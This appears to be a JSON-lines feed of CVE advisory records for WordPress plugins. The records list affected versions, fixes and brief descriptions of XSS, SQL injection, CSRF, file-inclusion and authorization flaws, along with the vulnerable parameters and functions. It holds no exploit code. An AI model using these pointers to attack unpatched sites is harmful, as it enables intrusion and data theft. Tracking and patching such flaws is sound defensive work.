{"CVE_ID":"CVE-2024-9182","slug":"contact-forms-anti-spam","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Maspik  WordPress plugin before 2.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40007323-d684-430d-a882-8b4dfb76172b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40007323-d684-430d-a882-8b4dfb76172b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13234","slug":"woo-product-tables","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Product Table by WBW plugin for WordPress is vulnerable to SQL Injection via the 'additionalCondition' parameter in all versions up to, and including, 2.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221872%40woo-product-tables&new=3221872%40woo-product-tables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221872%40woo-product-tables&new=3221872%40woo-product-tables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67db430e-d796-4ace-b5d1-de492edb8ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67db430e-d796-4ace-b5d1-de492edb8ea8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37519","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.27","versionEndExcluding":"2.1.28","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.27.","recommendation":"Update to version 2.1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-gutenberg-blocks-for-wordpress-plugin-2-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-gutenberg-blocks-for-wordpress-plugin-2-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8712","slug":"gtm-server-side","versionImpact":"2.1.19","versionEndExcluding":"2.1.20","description":"The GTM Server Side plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28f77d5a-fc17-4e17-85b9-4e6f66dbf2c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28f77d5a-fc17-4e17-85b9-4e6f66dbf2c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gtm-server-side\\\/tags\\\/2.1.19\\\/templates\\\/class-gtm-server-side-admin.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gtm-server-side\\\/tags\\\/2.1.19\\\/templates\\\/class-gtm-server-side-admin.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158847\\\/gtm-server-side\\\/tags\\\/2.1.20\\\/templates\\\/class-gtm-server-side-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158847\\\/gtm-server-side\\\/tags\\\/2.1.20\\\/templates\\\/class-gtm-server-side-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36712","slug":"kali-forms","versionEndExcluding":"2.1.2","description":"The Kali Forms plugin for WordPress is vulnerable to Unauthenticated Arbitrary Post Deletion in versions up to, and including, 2.1.1. This is due to the kaliforms_form_delete_uploaded_file function lacking any privilege or user protections. This makes it possible for unauthenticated attackers to delete any site post or page with the id parameter.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92644676-add4-415c-9a1a-c6616108688d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92644676-add4-415c-9a1a-c6616108688d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3219","slug":"eventon-lite","versionEndExcluding":"2.1.2","description":"The EventON WordPress plugin before 2.1.2 does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72d80887-0270-4987-9739-95b1a178c1fd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72d80887-0270-4987-9739-95b1a178c1fd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2796","slug":"eventon-lite","versionEndExcluding":"2.1.2","description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef793c-e5a3-4c55-beee-56b0909f7a0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef793c-e5a3-4c55-beee-56b0909f7a0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4649","slug":"wp-extended-search","versionEndExcluding":"2.1.2","description":"The WP Extended Search WordPress plugin before 2.1.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d9ba176-97be-4b6b-9cf1-6c3047321a1e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d9ba176-97be-4b6b-9cf1-6c3047321a1e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11750","slug":"onlyoffice-docspace","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The ONLYOFFICE DocSpace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice-docspace' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200973%40onlyoffice-docspace&new=3200973%40onlyoffice-docspace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200973%40onlyoffice-docspace&new=3200973%40onlyoffice-docspace&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f24bdd-0b78-4ec3-821b-6331e5bf65e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f24bdd-0b78-4ec3-821b-6331e5bf65e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9344","slug":"searchpro","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The BerqWP \u2013 Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d5e5b5-033c-4690-9857-3339e2831340?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d5e5b5-033c-4690-9857-3339e2831340?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3160806%40searchpro&new=3160806%40searchpro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3160806%40searchpro&new=3160806%40searchpro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/simplehtmldom\\\/example\\\/scraping\\\/example_scraping_general.php?rev=3138385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/simplehtmldom\\\/example\\\/scraping\\\/example_scraping_general.php?rev=3138385\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3248","slug":"mystickyelements","versionEndExcluding":"2.1.2","description":"The All-in-one Floating Contact Form WordPress plugin before 2.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90c7496b-552f-4566-b7ae-8c953c965352\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90c7496b-552f-4566-b7ae-8c953c965352\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12502","slug":"my-idx-home-search","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11889","slug":"my-idx-home-search","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/my-idx-home-search\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/my-idx-home-search\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5604","slug":"bug-library","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The Bug Library WordPress plugin before 2.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29985150-8d49-4a3f-8411-5d7263b424d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29985150-8d49-4a3f-8411-5d7263b424d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0071","slug":"wp-expand-tabs-free","versionEndExcluding":"2.1.17","description":"The WP Tabs WordPress plugin before 2.1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3834a162-2cdc-41e9-9c9d-2b576eed4db9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3834a162-2cdc-41e9-9c9d-2b576eed4db9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13727","slug":"memberspace","versionImpact":"2.1.13","versionEndExcluding":"2.1.14","description":"The MemberSpace  WordPress plugin before 2.1.14 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"Update to version 2.1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/598d20f2-0f42-48f2-a941-0d6c5da5303e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/598d20f2-0f42-48f2-a941-0d6c5da5303e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4450","slug":"post-grid","versionEndExcluding":"2.1.13","description":"The Post Grid plugin for WordPress is vulnerable to blind SQL Injection via post metadata in versions up to, and including, 2.1.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with contributor-level permissions and above to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a321b112-ce37-4a0e-800f-f3feef6ac799?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a321b112-ce37-4a0e-800f-f3feef6ac799?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2644269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2644269\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38704","slug":"wp-team-manager","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in DynamicWebLab WordPress Team Manager allows PHP Local File Inclusion.This issue affects WordPress Team Manager: from n\/a through 2.1.12.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-team-manager\\\/wordpress-team-manager-plugin-2-1-12-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-team-manager\\\/wordpress-team-manager-plugin-2-1-12-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9703","slug":"arconix-shortcodes","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef395956-477c-4970-becd-4f437e4807a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef395956-477c-4970-becd-4f437e4807a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170741%40arconix-shortcodes&new=3170741%40arconix-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170741%40arconix-shortcodes&new=3170741%40arconix-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11911","slug":"wp-crowdfunding","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_woocommerce_plugin() function action in all versions up to, and including, 2.1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install WooCommerce. This has a limited impact on most sites because WooCommerce is a requirement.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206336%40wp-crowdfunding%2Ftrunk&old=3174230%40wp-crowdfunding%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206336%40wp-crowdfunding%2Ftrunk&old=3174230%40wp-crowdfunding%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/972be091-64c4-4cb7-9563-70249c0db157?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/972be091-64c4-4cb7-9563-70249c0db157?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0862","slug":"supersaas-appointment-scheduling","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The SuperSaaS \u2013 online appointment scheduling plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018after\u2019 parameter in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is limited to Chromium-based browsers (e.g. Chrome, Edge, Brave).","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235242\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8698255b-6c03-464b-8cb5-191d3e77009f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8698255b-6c03-464b-8cb5-191d3e77009f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0170","slug":"html5-audio-player","versionEndExcluding":"2.1.12","description":"The Html5 Audio Player WordPress plugin before 2.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ee5e33-acc8-40c5-8f54-c9cb0fa491f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ee5e33-acc8-40c5-8f54-c9cb0fa491f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2299","slug":"luckywp-table-of-contents","versionImpact":"2.1.10","versionEndExcluding":"2.1.11","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.10. This is due to missing or incorrect nonce validation on the 'ajaxEdit' function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/controllers\\\/EditorBlockController.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/controllers\\\/EditorBlockController.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/widgets\\\/customizeSuccess\\\/views\\\/widget.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/widgets\\\/customizeSuccess\\\/views\\\/widget.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265169\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265169\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82df5b2e-4c4a-402f-99c9-694fa710009b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82df5b2e-4c4a-402f-99c9-694fa710009b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12579","slug":"minify-html-markup","versionImpact":"2.1.10","versionEndExcluding":"2.1.11","description":"The Minify HTML plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 2.1.10. This is due to processing user-supplied input as a regular expression.  This makes it possible for unauthenticated attackers to create comments that can cause catastrophic backtracking and break pages.","recommendation":"Update to version 2.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203890\\\/minify-html-markup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203890\\\/minify-html-markup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80334e81-c33d-464c-9409-f49c34681890?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80334e81-c33d-464c-9409-f49c34681890?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6163","slug":"wp-crowdfunding","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The WP Crowdfunding WordPress plugin before 2.1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ed6de4d-0a37-497f-971d-b6711893c557\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ed6de4d-0a37-497f-971d-b6711893c557\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25147","slug":"pretty-link","versionEndExcluding":"2.1.10","description":"The Pretty Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via various IP headers as well as the referer header in versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping in the track_link function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae058c5b-b90b-4a1e-9f56-d56dbd2d3607?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae058c5b-b90b-4a1e-9f56-d56dbd2d3607?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/stored-xss-and-csv-injection-vulnerabilities-in-wordpress-shortlinks-by-pretty-links-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/stored-xss-and-csv-injection-vulnerabilities-in-wordpress-shortlinks-by-pretty-links-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2108490%40pretty-link%2Ftrunk&old=2078274%40pretty-link%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2108490%40pretty-link%2Ftrunk&old=2078274%40pretty-link%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1526","slug":"dethemekit-for-elementor","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The DethemeKit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the De Product Display Widget (countdown feature) in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched 